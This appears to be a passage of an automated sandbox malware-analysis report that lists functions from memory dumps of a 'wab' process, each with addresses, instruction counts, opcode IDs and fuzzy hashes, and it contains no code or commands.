                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8ff75a06f62630aa16c32e190f7ef902b1d706cb15293a5472ecdefa3fbcde14
                                                                                  • Instruction ID: 70709c7af67e510631c333ae820e0bbbe317808f80357394e8e933fd4412aff5
                                                                                  • Opcode Fuzzy Hash: 8ff75a06f62630aa16c32e190f7ef902b1d706cb15293a5472ecdefa3fbcde14
                                                                                  • Instruction Fuzzy Hash: A6215B302081414FEF65AB29D884B993BBAEF54B14F104A21E00FEB265EBBCDC45CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000E4F98 Relevance: .1, Instructions: 68COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a7c5b5c21e8d36ddea25420434ca63015fae93cd9c1efc50d696449d35db9442
                                                                                  • Instruction ID: b58e65b338410564bac8e0cf767d0903610f7b74e19f6b0dcd0a5e8960be7624
                                                                                  • Opcode Fuzzy Hash: a7c5b5c21e8d36ddea25420434ca63015fae93cd9c1efc50d696449d35db9442
                                                                                  • Instruction Fuzzy Hash: CD211434A00244CFDB54EB79C958AADBBF1EF89705F200468E506FB3A1DB7A9D01CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000E17C0 Relevance: .1, Instructions: 59COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1939e6d8fc5c4ae99199f6db913b3ae37d9ef7ca68672dfb8c87bfa2208ed7e4
                                                                                  • Instruction ID: 753a1b14fd4e78ee065f5263927b056316faf8ef8aed473053a6e42f48c31aa1
                                                                                  • Opcode Fuzzy Hash: 1939e6d8fc5c4ae99199f6db913b3ae37d9ef7ca68672dfb8c87bfa2208ed7e4
                                                                                  • Instruction Fuzzy Hash: 0411A576B006559FCF50AB79884469E7FE5EB48750F204425E95AEB340EB38C902CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000E1498 Relevance: .1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 65672239ec59c38ec62c672c6fcdb7cf8a02cfcde062153fd269bdc9638f460c
                                                                                  • Instruction ID: 3ab22e2d00a61c53f330ade107728ba21174e2b2105d133ccc22aad59a573a8e
                                                                                  • Opcode Fuzzy Hash: 65672239ec59c38ec62c672c6fcdb7cf8a02cfcde062153fd269bdc9638f460c
                                                                                  • Instruction Fuzzy Hash: B5016D71A016A49FCF61EFBA84412EE7BE5EB48310B240479E806F7342E635D8818BA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000BD03F Relevance: .1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277061150.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_bd000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d21551876316e45bd0f5c645c1d798fb76669fd7c0fc968ae6a832c02c9a4eed
                                                                                  • Instruction ID: c983a1348a8f6ee936a0baa46824c4ab5fe96914ecc8c0c16c834cdef7cfd0bd
                                                                                  • Opcode Fuzzy Hash: d21551876316e45bd0f5c645c1d798fb76669fd7c0fc968ae6a832c02c9a4eed
                                                                                  • Instruction Fuzzy Hash: 1211DD75504284DFCB12CF14C9C4B15FFA2FB84314F24CAAAD9494B256C33AD84ACF62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000EF6F7 Relevance: .1, Instructions: 52COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6cb47860d55fe4dbd72602c6afd3104b882857ca357483e8debd4e0be0064e62
                                                                                  • Instruction ID: c94ba6619827cb55bfa160aa0d961bcaa742770878e9e94729392608e6ce29ee
                                                                                  • Opcode Fuzzy Hash: 6cb47860d55fe4dbd72602c6afd3104b882857ca357483e8debd4e0be0064e62
                                                                                  • Instruction Fuzzy Hash: 76111F34604206CFCB54DFA5D594D6DBBB2EF48304F208439E446AB369DB75EC46CB41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000EA6D8 Relevance: .0, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cb8183fd7c7d03b55c972ab9c3834b45a643f50eec4c12ee819e2ad672b61be5
                                                                                  • Instruction ID: c2ef3969d5e8c57ff86acaf5957dfa3152229bd07fc917a08fb5e2ef873bd5d4
                                                                                  • Opcode Fuzzy Hash: cb8183fd7c7d03b55c972ab9c3834b45a643f50eec4c12ee819e2ad672b61be5
                                                                                  • Instruction Fuzzy Hash: EB019231A001048FCB04EF95D985B8ABBB6FF85311F54C664DC485B25AEB70EE5ACB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000E7EA8 Relevance: .0, Instructions: 42COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 19bc15a2c3958a4cf7215a134cb8b21c255a737e7c3f6688e25ed5dc076d6957
                                                                                  • Instruction ID: be63cd1d6922616d5e588300065769e58747af70a4a74312f75ff1164ce29ee2
                                                                                  • Opcode Fuzzy Hash: 19bc15a2c3958a4cf7215a134cb8b21c255a737e7c3f6688e25ed5dc076d6957
                                                                                  • Instruction Fuzzy Hash: EF014834A04244CFDB54EB74C558BAD77F2EB88319F6440A8E10BAB2A1DB38AD42CF41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000EFE5E Relevance: .0, Instructions: 39COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ebc7ba6ae9e67b5e71b086ce86d0c0e3b7c85b01d88211267b606bb0b126640f
                                                                                  • Instruction ID: bdf0f5288a1979016699a565b8390e62df6f0546ba999051a5e740f197530ae9
                                                                                  • Opcode Fuzzy Hash: ebc7ba6ae9e67b5e71b086ce86d0c0e3b7c85b01d88211267b606bb0b126640f
                                                                                  • Instruction Fuzzy Hash: 4BF08C35B001199FDB10CBA9D850BEEB7F1FF88322F148561E519A7295C634DD118BA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000EFF40 Relevance: .0, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e9c82e77a7084ecd8a22c098a994eb81ab511787f6c4343183216bfd6c222311
                                                                                  • Instruction ID: 1a15c09eaa41d3b4c54f863a5e7eb37fade5994a5543093f1c8e6a2cee94e8d7
                                                                                  • Opcode Fuzzy Hash: e9c82e77a7084ecd8a22c098a994eb81ab511787f6c4343183216bfd6c222311
                                                                                  • Instruction Fuzzy Hash: 6CE06DB2E101468E9B90EABA9A022EFB7F4EF48250F548476D41AE3104F635CA014BD2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000EFF50 Relevance: .0, Instructions: 25COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a943a1730ac5939f9f02030238350ac099f6f70db84ffcb91b11ce3493053917
                                                                                  • Instruction ID: 5a3fb725b93ba732b29fd69257d08005db63f324aa89b00b81a83aae454bbb63
                                                                                  • Opcode Fuzzy Hash: a943a1730ac5939f9f02030238350ac099f6f70db84ffcb91b11ce3493053917
                                                                                  • Instruction Fuzzy Hash: 0AE04871D001169F8B50DEBA59011BF77F8EF45250F104476D409E3204F731CA0087D1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000EFBC8 Relevance: .0, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5299164b1011bd9862e8f12e7f66b476ee5a3816bb395e5dec2b74c67407f1ba
                                                                                  • Instruction ID: 03f631fc66dcc51fc9e643740335ec29a254fb7c45af5100080f365566199fef
                                                                                  • Opcode Fuzzy Hash: 5299164b1011bd9862e8f12e7f66b476ee5a3816bb395e5dec2b74c67407f1ba
                                                                                  • Instruction Fuzzy Hash: 13E0C236B041E64F0E28B56AA8914FDA3A1EB893657208136F909FB203DB219D02C3C1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000EF4B0 Relevance: .0, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3403e64c5a4d193e330b397a710c52ef1de3a3b2b36ba8bbfa967c3f9bcadd54
                                                                                  • Instruction ID: 8d6f670c5f3c2bc2b2b1182410b609b22c8d9405eed284e28b27b0fd779260e8
                                                                                  • Opcode Fuzzy Hash: 3403e64c5a4d193e330b397a710c52ef1de3a3b2b36ba8bbfa967c3f9bcadd54
                                                                                  • Instruction Fuzzy Hash: 9EE086766182C70FEB32491689D27797A74D712324F1905A3E4AECF2D3C12ACC41C712
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000EF4C0 Relevance: .0, Instructions: 19COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f876974f4f8435bdec7a6fe4c8899984a8927a1dd7a590092b0aefc0c5260bb6
                                                                                  • Instruction ID: b26b87eef4fb7470024d9e49ca7db0a3a89b4a07d5472d9a54bfdbf356b6e497
                                                                                  • Opcode Fuzzy Hash: f876974f4f8435bdec7a6fe4c8899984a8927a1dd7a590092b0aefc0c5260bb6
                                                                                  • Instruction Fuzzy Hash: 81D05E706040874FEF705D67859973AB3DCE714310F100831E80EE62C0DA2ACC408502
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000EEB40 Relevance: .0, Instructions: 18COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 53918979c284f3864e6b2783d64315557054f6e8742f5b020f31aa0b73e300ba
                                                                                  • Instruction ID: 331dcd6574ba9185ac093dfb7c9c3c655ac3860c54cf2613a69e4e2e4b469e91
                                                                                  • Opcode Fuzzy Hash: 53918979c284f3864e6b2783d64315557054f6e8742f5b020f31aa0b73e300ba
                                                                                  • Instruction Fuzzy Hash: 80D09722935FC40FE3350258EC9A6BA7BD02B84B20F094097E81BE79D2DB345D028384
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000EEB50 Relevance: .0, Instructions: 16COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 90272fafd5cd368d1b5ab66f17ae6765a5b7c4df761c32b524da0a66170542f0
                                                                                  • Instruction ID: 9e286a78c75fc533beb746ba58e86091e8fd4eee09983bed85f89253aa0cad18
                                                                                  • Opcode Fuzzy Hash: 90272fafd5cd368d1b5ab66f17ae6765a5b7c4df761c32b524da0a66170542f0
                                                                                  • Instruction Fuzzy Hash: 7DD0A730205B948FC374D659D184A9BB7E9BB88714F444519E44783E80CB70FC028784
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000EF42F Relevance: .0, Instructions: 15COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2c25cbcfd4db758888f53bbb2b01b267da6e29abf54e67adf205fff534787a60
                                                                                  • Instruction ID: c4a30bd9b023d78a66bb06ed23ad4446fc8846974b25d99825334f45c925cc93
                                                                                  • Opcode Fuzzy Hash: 2c25cbcfd4db758888f53bbb2b01b267da6e29abf54e67adf205fff534787a60
                                                                                  • Instruction Fuzzy Hash: 31D01277F051146FDF04E6B0EC015EDB363EF80670F1104A1E6186B151DA361E22C781
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000E7F14 Relevance: .0, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6b260c9147bc7b64d2caf75ff0d0015a44cba1f9ec4059b26e61b528a7943fdb
                                                                                  • Instruction ID: 81f0f40e33470b4db33db8c50243facf81ad63a48138123fd32f30df3b8c0153
                                                                                  • Opcode Fuzzy Hash: 6b260c9147bc7b64d2caf75ff0d0015a44cba1f9ec4059b26e61b528a7943fdb
                                                                                  • Instruction Fuzzy Hash: 1AC08C219080CC8BDB6053A9A4086EC7BA0D7C1362F100072D109A0072536801A8D611
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%